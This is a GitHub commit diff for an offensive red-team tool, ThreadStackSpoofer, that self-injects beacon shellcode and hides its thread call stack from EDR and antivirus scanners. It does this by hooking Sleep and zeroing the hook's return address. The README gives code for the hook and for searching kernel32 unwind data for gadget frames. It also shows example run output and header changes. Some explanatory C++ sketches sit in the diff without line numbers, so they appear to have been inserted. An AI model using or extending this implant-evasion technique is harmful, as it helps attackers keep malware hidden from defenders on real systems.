Commit ad18322

committed
Reworked original implementation to now simply overwrite MySleep return address with 0.
1 parent c250724 commit ad18322

6 files changed

+168
-384
lines changed

README.md

Lines changed: 118 additions & 55 deletions
Original file line numberDiff line numberDiff line change
@@ -12,6 +12,25 @@ An implementation may differ, however the idea is roughly similar to what commer
1212
Implementation along with my [ShellcodeFluctuation](https://github.com/mgeeky/ShellcodeFluctuation) brings Offensive Security community sample implementations to catch up on the offering made by commercial C2 products, so that we can do no worse in our Red Team toolings. 💪
1313

1414

15+
### Implementation has changed
16+
17+
The current implementation differs heavily from what was originally published. This is because I realised that there is a far simpler way to terminate a thread's call stack and hide the shellcode-related frames: simply write `0` to the return address of our handler:
18+
19+
```
20+
void WINAPI MySleep(DWORD _dwMilliseconds)
21+
{
22+
[...]
23+
PULONG_PTR overwrite = (PULONG_PTR)_AddressOfReturnAddress();
24+
*overwrite = 0;
25+
26+
[...]
27+
*overwrite = origReturnAddress;
28+
}
29+
```
30+
31+
The previous implementation, utilising `StackWalk64`, can be accessed in this [commit c250724](https://github.com/mgeeky/ThreadStackSpoofer/tree/c2507248723d167fb2feddf50d35435a17fd61a2).
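
To illustrate why a zeroed return address hides the frames behind it, here is a minimal, portable sketch. It does not touch a real stack: `FakeFrame` and `countVisibleFrames` are hypothetical names made up for this example, and the walker is a deliberately naive model that treats a return address of `0` as the end of the chain. Real walkers rely on unwind metadata, so take this only as an intuition aid.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical, simplified model: a frame is reduced to its return address.
struct FakeFrame {
    std::uint64_t returnAddress;
};

// Walks the frames from the innermost one outwards and stops right after
// the first frame whose return address is 0 (assumed end-of-stack marker).
std::size_t countVisibleFrames(const std::vector<FakeFrame>& stack)
{
    std::size_t visible = 0;
    for (const FakeFrame& frame : stack) {
        ++visible;                      // the current frame is still reported
        if (frame.returnAddress == 0)   // nowhere left to unwind to
            break;
    }
    return visible;
}
```

With three frames the model reports three; once the innermost return address is set to `0`, only that first frame remains visible, which mirrors the call stack ending at `MySleep`.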
32+
33+
1534
## How it works?
1635

1736
This program performs shellcode self-injection (roughly via the classic `VirtualAlloc` + `memcpy` + `CreateThread`).
@@ -26,12 +45,9 @@ The rough algorithm is following:
2645
3. Hook `kernel32!Sleep` pointing back to our callback.
2746
4. Inject and launch shellcode via `VirtualAlloc` + `memcpy` + `CreateThread`. A slight twist here is that our thread starts from a legitimate `ntdll!RtlUserThreadStart+0x21` address to mimic other threads.
2847
5. As soon as Beacon attempts to sleep, our `MySleep` callback gets invoked.
29-
6. Stack Spoofing begins.
30-
7. Firstly we walk call stack of our current thread, utilising `ntdll!RtlCaptureContext` and `dbghelp!StackWalk64`
31-
8. We save all of the stack frames that match our `seems-to-be-beacon-frame` criteria (such as the return address pointing back to memory that is `MEM_PRIVATE` or has `Type = 0`, or memory whose protection flags are not `R/RX/RWX`)
32-
9. We iterate over collected frames (gathered function frame pointers `RBP/EBP` - in `frame.frameAddr`) and overwrite _on-stack_ return addresses with a fake `::CreateFileW` address.
33-
10. Finally a call to `::SleepEx` is made to let the Beacon's sleep while waiting for further communication.
34-
11. After Sleep is finished, we restore previously saved original function return addresses and execution is resumed.
48+
6. Overwrite the last return address on the stack with `0`, which should effectively terminate the call stack.
49+
7. Finally, a call to `::SleepEx` is made to let the Beacon sleep while waiting for further communication.
50+
8. After the sleep finishes, we restore the previously saved original return address and execution resumes.
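
The overwrite, sleep and restore steps can be sketched as a small RAII helper. This is only an illustration under stated assumptions: `ReturnAddressGuard` is a hypothetical name that does not exist in this repository, and the helper operates on any 64-bit slot, so it can be tried without touching a real stack.

```cpp
#include <cstdint>

// Hypothetical helper: saves the value stored in a return-address slot,
// zeroes the slot for the guard's lifetime and restores it on destruction.
class ReturnAddressGuard {
public:
    explicit ReturnAddressGuard(std::uint64_t* slot)
        : slot_(slot), saved_(*slot)
    {
        *slot_ = 0;             // terminate the call stack at this frame
    }

    ~ReturnAddressGuard()
    {
        *slot_ = saved_;        // put the original return address back
    }

    ReturnAddressGuard(const ReturnAddressGuard&) = delete;
    ReturnAddressGuard& operator=(const ReturnAddressGuard&) = delete;

    std::uint64_t saved() const { return saved_; }

private:
    std::uint64_t* slot_;
    std::uint64_t  saved_;
};
```

In an x64 MSVC build, `MySleep` could presumably construct such a guard from the pointer returned by `_AddressOfReturnAddress()` before calling `::SleepEx`, so that the restore cannot be forgotten on any exit path. That usage is an assumption and not what this commit does.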
3551

3652
Function return addresses are scattered all around the thread's stack memory area, pointed to by `RBP/EBP` register. In order to find them on the stack, we need to firstly collect frame pointers, then dereference them for overwriting:
3753

@@ -54,21 +70,22 @@ This is how a call stack may look like when it is **NOT** spoofed:
5470

5571
And this is how it looks when thread stack spoofing is enabled:
5672

57-
![spoofed](images/spoofed.png)
58-
59-
Above we can see a sequence of `kernel32!CreateFileW` being implanted as return addresses. That's merely an example proving that we can manipulate return addresses.
60-
To better enhance quality of this call stack, one could prepare a list of addresses and then use them while picking subsequent frames for overwriting.
61-
62-
For example, a following chain of addresses could be used:
73+
![spoofed](images/spoofed2.png)
6374

75+
Above we can see that the last frame on our call stack is our `MySleep` callback. That immediately creates an opportunity for IOC hunting: look for threads whose call stacks do not unwind into the following two commonly expected system entry points:
6476
```
65-
KernelBase.dll!WaitForSingleObjectEx+0x8e
66-
KernelBase.dll!WaitForSingleObject+0x52
6777
kernel32!BaseThreadInitThunk+0x14
6878
ntdll!RtlUserThreadStart+0x21
69-
```
79+
```
80+
81+
However, a brief examination of my system showed that there are plenty of threads whose call stacks do not unwind to the above handlers:
82+
83+
![legit call stack](images/legit-call-stack.png)
84+
85+
The above screenshot shows an unmodified, unhooked thread of Total Commander x64.
86+
87+
Why should we care about carefully faking our call stack when there are processes exhibiting traits that we can simply mimic?
7088

71-
When thinking about AVs, EDRs and other automated scanners - we don't need to care about how much legitimate our thread's call stack look, since these scanners only care whether a frame points back to a `SEC_IMAGE` memory pages, meaning it was a legitimate DLL/EXE call (and whether these DLLs are trusted/signed themselves). Thus, we don't need to bother that much about these chain of `CreateFileW` frames.
7289

7390

7491
## How do I use it?
@@ -105,6 +122,82 @@ Next areas for improving the outcome are to research how we can _exchange_ or co
105122
4. Create a new user stack with `RtlCreateUserStack` / `RtlFreeUserStack` and exchange stacks from a Beacons thread into that newly created one
106123

107124

125+
## Implementing a true Thread Stack Spoofer
126+
127+
An hours-long conversation with [namazso](https://twitter.com/namazso) taught me that in order to aim for a proper thread stack spoofer we would need to reverse the x64 call stack unwinding process.
128+
Firstly, one needs to carefully study the stack unwinding process explained in (a) linked below. When the system traverses a thread's call stack on the x64 architecture, it does not simply rely on return addresses scattered around the thread's stack, but rather it:
129+
130+
1. Takes the return address.
131+
2. Attempts to identify the function containing that address (with [RtlLookupFunctionEntry](https://docs.microsoft.com/en-us/windows/win32/api/winnt/nf-winnt-rtllookupfunctionentry)).
132+
3. That function returns a `RUNTIME_FUNCTION` entry, which in turn references the `UNWIND_INFO` and `UNWIND_CODE` structures. Together these describe the function's beginning and ending addresses and the prologue code sequences that modify `RBP` or `RSP`.
133+
4. The system needs to know about every stack and frame pointer modification made by each function across the call stack, so that it can virtually _roll back_ these changes and restore the stack pointers to their values at the moment the processed frame was called (this is implemented in [RtlVirtualUnwind](https://docs.microsoft.com/ru-ru/windows/win32/api/winnt/nf-winnt-rtlvirtualunwind)).
134+
5. The system processes all `UNWIND_CODE`s that the examined function exhibits to precisely compute the location of that frame's return address and the stack pointer value.
135+
6. Through this emulation, the system is able to walk down the chain of frames and effectively "unwind" the call stack.
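
The arithmetic behind locating a frame's return address can be sketched as follows. This is a simplified model and not the real `RtlVirtualUnwind`: `DecodedUnwindOp` and `returnAddressOffset` are hypothetical names, each entry is assumed to be already decoded into one operation (the raw `UNWIND_CODE` array spreads some operations over several slots), and frame-pointer based frames are ignored. The opcode values follow the documented x64 unwind codes (`UWOP_PUSH_NONVOL` = 0, `UWOP_ALLOC_LARGE` = 1, `UWOP_ALLOC_SMALL` = 2, `UWOP_SET_FPREG` = 3).

```cpp
#include <cstdint>
#include <vector>

// Subset of the documented x64 unwind operation codes.
enum class UnwindOp : std::uint8_t {
    PushNonvol = 0,   // UWOP_PUSH_NONVOL: push of a nonvolatile register
    AllocLarge = 1,   // UWOP_ALLOC_LARGE: large stack allocation
    AllocSmall = 2,   // UWOP_ALLOC_SMALL: allocation of OpInfo * 8 + 8 bytes
    SetFpreg   = 3,   // UWOP_SET_FPREG: frame register established
};

// Hypothetical, already-decoded form: one entry per prologue operation.
struct DecodedUnwindOp {
    UnwindOp      op;
    std::uint8_t  opInfo;     // register number or scaled size, per opcode
    std::uint32_t allocSize;  // byte size, used only for AllocLarge
};

// Returns how many bytes above RSP (after the prologue has run) the return
// address sits, assuming the function does not use a frame pointer.
std::uint64_t returnAddressOffset(const std::vector<DecodedUnwindOp>& ops)
{
    std::uint64_t offset = 0;
    for (const DecodedUnwindOp& u : ops) {
        switch (u.op) {
        case UnwindOp::PushNonvol:
            offset += 8;                                        // one pushed register
            break;
        case UnwindOp::AllocSmall:
            offset += static_cast<std::uint64_t>(u.opInfo) * 8 + 8;
            break;
        case UnwindOp::AllocLarge:
            offset += u.allocSize;
            break;
        case UnwindOp::SetFpreg:
            break;                                              // ignored in this sketch
        }
    }
    return offset;
}
```

For a prologue of `push rbp; push rbx; sub rsp, 0x28` the model gives 8 + 8 + 40 = 56, meaning the return address sits at `RSP + 56` once the prologue has completed.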
136+
137+
In order to interfere with this process we would need to _revert it_ by having our own reversed form of `RtlVirtualUnwind`. We would need to iterate over the functions defined in a module (say, `kernel32`), scan each function's `UNWIND_CODE` codes and closely emulate them backwards (as compared to `RtlVirtualUnwind`, and more precisely `RtlpUnwindPrologue`) in order to find the locations on the stack where our fake return addresses should be placed.
138+
139+
[namazso](https://twitter.com/namazso) mentions the necessity to introduce 3 fake stack frames to nicely stitch the call stack:
140+
141+
1. A "desync" frame (consider it a _gadget frame_) that unwinds differently from the caller of our `MySleep` (having a different `UWOP`, the Unwind Operation code). We find it by looking through all functions in a module, examining their UWOPs, and calculating how big the fake frame should be. This frame must have UWOPs **different** from those of our `MySleep`'s caller.
142+
2. The next frame we want to find is a function that unwinds by popping into `RBP` from the stack, basically through the `UWOP_PUSH_NONVOL` code.
143+
3. For the third frame we need a function that restores `RSP` from `RBP` through the `UWOP_SET_FPREG` code.
144+
145+
The restored `RSP` must be set to the `RSP` value taken from wherever control flow entered our `MySleep`, so that all our frames become hidden as a result of the third gadget unwinding there.
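
The selection criteria for the second and third gadget frames could be expressed as simple predicates. The sketch below is an assumption-laden illustration: `FunctionUnwind`, `popsIntoRbp` and `restoresRspFromRbp` are hypothetical names, the unwind data is modelled as already-decoded operations, and only the documented constants are relied upon (`UWOP_PUSH_NONVOL` = 0, `UWOP_SET_FPREG` = 3, register number 5 for `RBP`).

```cpp
#include <algorithm>
#include <cstdint>
#include <vector>

constexpr std::uint8_t kUwopPushNonvol = 0;  // UWOP_PUSH_NONVOL
constexpr std::uint8_t kUwopSetFpreg   = 3;  // UWOP_SET_FPREG
constexpr std::uint8_t kRegRbp         = 5;  // RBP in the unwind register numbering

// Hypothetical decoded view of one operation and of one function's unwind data.
struct UnwindOpEntry {
    std::uint8_t opcode;
    std::uint8_t opInfo;
};

struct FunctionUnwind {
    std::uint8_t               frameRegister;  // 0 when no frame pointer is used
    std::vector<UnwindOpEntry> ops;
};

// Second gadget: unwinding this function pops a stack value into RBP,
// because its prologue pushed RBP.
bool popsIntoRbp(const FunctionUnwind& fn)
{
    return std::any_of(fn.ops.begin(), fn.ops.end(),
        [](const UnwindOpEntry& e) {
            return e.opcode == kUwopPushNonvol && e.opInfo == kRegRbp;
        });
}

// Third gadget: unwinding this function recomputes RSP from RBP,
// because RBP was established as its frame register.
bool restoresRspFromRbp(const FunctionUnwind& fn)
{
    if (fn.frameRegister != kRegRbp)
        return false;
    return std::any_of(fn.ops.begin(), fn.ops.end(),
        [](const UnwindOpEntry& e) { return e.opcode == kUwopSetFpreg; });
}
```

A real search would additionally have to account for frame sizes and offsets when stitching the fake frames together; these predicates only narrow down the candidate functions.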
146+
147+
In order to begin the process, one can iterate over the executable's `.pdata` section by dereferencing the `IMAGE_DIRECTORY_ENTRY_EXCEPTION` data directory entry.
148+
Consider the example below:
149+
150+
```
151+
ULONG_PTR imageBase = (ULONG_PTR)GetModuleHandleA("kernel32");
152+
PIMAGE_NT_HEADERS64 pNthdrs = PIMAGE_NT_HEADERS64(imageBase + PIMAGE_DOS_HEADER(imageBase)->e_lfanew);
153+
154+
auto excdir = pNthdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION];
155+
if (excdir.Size == 0 || excdir.VirtualAddress == 0)
156+
return;
157+
158+
auto begin = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase);
159+
auto end = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase + excdir.Size);
160+
161+
UNWIND_HISTORY_TABLE mshist = { 0 };
162+
DWORD64 imageBase2 = 0;
163+
164+
PRUNTIME_FUNCTION currFrame = RtlLookupFunctionEntry(
165+
(DWORD64)caller,
166+
&imageBase2,
167+
&mshist
168+
);
169+
170+
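if (currFrame == NULL)
return; // no unwind data registered for `caller` (e.g. dynamically allocated code)

// UnwindData is an RVA relative to the image containing `caller`, which is imageBase2
UNWIND_INFO *mySleep = (UNWIND_INFO*)(currFrame->UnwindData + imageBase2);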
171+
UNWIND_CODE myFrameUwop = (UNWIND_CODE)(mySleep->UnwindCodes[0]);
172+
173+
log("1. MySleep RIP UWOP: ", myFrameUwop.UnwindOpcode);
174+
175+
for (PRUNTIME_FUNCTION it = begin; it < end; ++it)
176+
{
177+
UNWIND_INFO* unwindData = (UNWIND_INFO*)(it->UnwindData + imageBase);
178+
UNWIND_CODE frameUwop = (UNWIND_CODE)(unwindData->UnwindCodes[0]);
179+
180+
if (frameUwop.UnwindOpcode != myFrameUwop.UnwindOpcode)
181+
{
182+
// Found candidate function for a desynch gadget frame
183+
184+
}
185+
}
186+
```
187+
188+
The process is a bit convoluted, yet it boils down to reverting the thread's call stack unwinding process by substituting arbitrary stack frames with other, carefully selected ones, in a ROP-like approach.
189+
190+
This PoC does not replicate this algorithm, because my current understanding allows me to accept the call stack finishing on an `EXE`-based stack frame, and I don't want to overcomplicate either my shellcode loaders or this PoC. I leave the exercise of implementing this and sharing it publicly to a keen reader. Or maybe I'll sit down and try doing it myself, given some more spare time :)
191+
192+
193+
**More information**:
194+
195+
a) [x64 exception handling - Stack Unwinding process explained](https://docs.microsoft.com/en-us/cpp/build/exception-handling-x64?view=msvc-160)
196+
b) [Sample implementation of `RtlpUnwindPrologue` and `RtlVirtualUnwind`](https://github.com/mic101/windows/blob/master/WRK-v1.2/base/ntos/rtl/amd64/exdsptch.c)
197+
c) [`.pdata` section](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#the-pdata-section)
198+
d) [another sample implementation of `RtlpUnwindPrologue`](https://github.com/hzqst/unicorn_pe/blob/master/unicorn_pe/except.cpp#L773)
199+
200+
108201
## Example run
109202

110203
Use case:
@@ -121,52 +214,22 @@ Where:
121214
Example run that spoofs beacon's thread call stack:
122215

123216
```
124-
C:\> ThreadStackSpoofer.exe beacon64.bin 1
217+
PS D:\dev2\ThreadStackSpoofer> .\x64\Release\ThreadStackSpoofer.exe .\tests\beacon64.bin 1
125218
[.] Reading shellcode bytes...
126-
[.] Thread call stack will be spoofed.
127-
[+] Stack spoofing initialized.
128219
[.] Hooking kernel32!Sleep...
129220
[.] Injecting shellcode...
130-
131-
WalkCallStack: Stack Trace:
132-
2. calledFrom: 0x7ff7c8ba7f54 - stack: 0xdc5eaffbd0 - frame: 0xdc5eaffce0 - ret: 0x2550d3ebd51 - skip? 0
133-
3. calledFrom: 0x2550d3ebd51 - stack: 0xdc5eaffcf0 - frame: 0xdc5eaffce8 - ret: 0x1388 - skip? 0
134-
4. calledFrom: 0x 1388 - stack: 0xdc5eaffcf8 - frame: 0xdc5eaffcf0 - ret: 0x2550d1ff760 - skip? 0
135-
5. calledFrom: 0x2550d1ff760 - stack: 0xdc5eaffd00 - frame: 0xdc5eaffcf8 - ret: 0x1b000100000004 - skip? 0
136-
6. calledFrom: 0x1b000100000004 - stack: 0xdc5eaffd08 - frame: 0xdc5eaffd00 - ret: 0xd00017003a0001 - skip? 0
137-
7. calledFrom: 0xd00017003a0001 - stack: 0xdc5eaffd10 - frame: 0xdc5eaffd08 - ret: 0x2550d5b7040 - skip? 0
138-
8. calledFrom: 0x2550d5b7040 - stack: 0xdc5eaffd18 - frame: 0xdc5eaffd10 - ret: 0x2550d3ccd9f - skip? 0
139-
9. calledFrom: 0x2550d3ccd9f - stack: 0xdc5eaffd20 - frame: 0xdc5eaffd18 - ret: 0x2550d3ccdd0 - skip? 0
140-
Spoofed: 0x2550d3ebd51 -> 0x7ffeb7f74b60
141-
Spoofed: 0x00001388 -> 0x7ffeb7f74b60
142-
Spoofed: 0x2550d1ff760 -> 0x7ffeb7f74b60
143-
Spoofed: 0x1b000100000004 -> 0x7ffeb7f74b60
144-
Spoofed: 0xd00017003a0001 -> 0x7ffeb7f74b60
145-
Spoofed: 0x2550d5b7040 -> 0x7ffeb7f74b60
146-
Spoofed: 0x2550d3ccd9f -> 0x7ffeb7f74b60
147-
Spoofed: 0x2550d3ccdd0 -> 0x7ffeb7f74b60
221+
[+] Shellcode is now running.
222+
[>] Original return address: 0x1926747bd51. Finishing call stack...
148223
149224
===> MySleep(5000)
150225
151-
[+] Shellcode is now running.
226+
[<] Restoring original return address...
227+
[>] Original return address: 0x1926747bd51. Finishing call stack...
228+
229+
===> MySleep(5000)
152230
153-
WalkCallStack: Stack Trace:
154-
2. calledFrom: 0x7ff7c8ba7f84 - stack: 0xdc5eaffbd0 - frame: 0xdc5eaffce0 - ret: 0x7ffeb7f74b60 - skip? 1
155-
3. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffcf0 - frame: 0xdc5eaffce8 - ret: 0x7ffeb7f74b60 - skip? 1
156-
4. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffcf8 - frame: 0xdc5eaffcf0 - ret: 0x7ffeb7f74b60 - skip? 1
157-
5. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd00 - frame: 0xdc5eaffcf8 - ret: 0x7ffeb7f74b60 - skip? 1
158-
6. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd08 - frame: 0xdc5eaffd00 - ret: 0x7ffeb7f74b60 - skip? 1
159-
7. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd10 - frame: 0xdc5eaffd08 - ret: 0x7ffeb7f74b60 - skip? 1
160-
8. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd18 - frame: 0xdc5eaffd10 - ret: 0x7ffeb7f74b60 - skip? 1
161-
9. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd20 - frame: 0xdc5eaffd18 - ret: 0x7ffeb7f74b60 - skip? 1
162-
Restored: 0x7ffeb7f74b60 -> 0x2550d3ebd51
163-
Restored: 0x7ffeb7f74b60 -> 0x1388
164-
Restored: 0x7ffeb7f74b60 -> 0x2550d1ff760
165-
Restored: 0x7ffeb7f74b60 -> 0x1b000100000004
166-
Restored: 0x7ffeb7f74b60 -> 0xd00017003a0001
167-
Restored: 0x7ffeb7f74b60 -> 0x2550d5b7040
168-
Restored: 0x7ffeb7f74b60 -> 0x2550d3ccd9f
169-
Restored: 0x7ffeb7f74b60 -> 0x2550d3ccdd0
231+
[<] Restoring original return address...
232+
[>] Original return address: 0x1926747bd51. Finishing call stack...
170233
```
171234

172235
## Word of caution

ThreadStackSpoofer/header.h

Lines changed: 1 addition & 47 deletions
Original file line numberDiff line numberDiff line change
@@ -1,59 +1,17 @@
11
#pragma once
22

33
#include <windows.h>
4-
#include <DbgHelp.h>
54
#include <iostream>
65
#include <sstream>
76
#include <iomanip>
87
#include <vector>
98

10-
119
typedef void (WINAPI* typeSleep)(
1210
DWORD dwMilis
1311
);
1412

15-
typedef BOOL(__stdcall* typeStackWalk64)(
16-
DWORD MachineType,
17-
HANDLE hProcess,
18-
HANDLE hThread,
19-
LPSTACKFRAME64 StackFrame,
20-
PVOID ContextRecord,
21-
PREAD_PROCESS_MEMORY_ROUTINE64 ReadMemoryRoutine,
22-
PFUNCTION_TABLE_ACCESS_ROUTINE64 FunctionTableAccessRoutine,
23-
PGET_MODULE_BASE_ROUTINE64 GetModuleBaseRoutine,
24-
PTRANSLATE_ADDRESS_ROUTINE64 TranslateAddress
25-
);
26-
27-
typedef BOOL(__stdcall* typeSymInitialize)(
28-
IN HANDLE hProcess,
29-
IN LPCSTR UserSearchPath,
30-
IN BOOL fInvadeProcess
31-
);
32-
3313
typedef std::unique_ptr<std::remove_pointer<HANDLE>::type, decltype(&::CloseHandle)> HandlePtr;
3414

35-
struct CallStackFrame
36-
{
37-
ULONG_PTR calledFrom;
38-
ULONG_PTR stackAddr;
39-
ULONG_PTR frameAddr;
40-
ULONG_PTR origFrameAddr;
41-
ULONG_PTR retAddr;
42-
ULONG_PTR overwriteWhat;
43-
};
44-
45-
static const size_t MaxStackFramesToSpoof = 64;
46-
struct StackTraceSpoofingMetadata
47-
{
48-
HMODULE hDbghelp;
49-
typeStackWalk64 pStackWalk64;
50-
LPVOID pSymFunctionTableAccess64;
51-
LPVOID pSymGetModuleBase64;
52-
bool initialized;
53-
CallStackFrame spoofedFrame[MaxStackFramesToSpoof];
54-
size_t spoofedFrames;
55-
};
56-
5715
struct HookedSleep
5816
{
5917
typeSleep origSleep;
@@ -71,7 +29,6 @@ struct HookTrampolineBuffers
7129
DWORD previousBytesSize;
7230
};
7331

74-
7532
template<class... Args>
7633
void log(Args... args)
7734
{
@@ -81,14 +38,11 @@ void log(Args... args)
8138
std::cout << oss.str() << std::endl;
8239
}
8340

84-
static const size_t Frames_To_Preserve = 2;
8541
static const DWORD Shellcode_Memory_Protection = PAGE_EXECUTE_READ;
8642

8743
bool hookSleep();
44+
void runShellcode(LPVOID param);
8845
bool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr& thread);
8946
bool readShellcode(const char* path, std::vector<uint8_t>& shellcode);
90-
void walkCallStack(HANDLE hThread, CallStackFrame* frames, size_t maxFrames, size_t* numOfFrames, bool onlyBeaconFrames, size_t framesToPreserve = Frames_To_Preserve);
91-
bool initStackSpoofing();
9247
bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers = NULL);
93-
void spoofCallStack(bool overwriteOrRestore);
9448
void WINAPI MySleep(DWORD _dwMilliseconds);
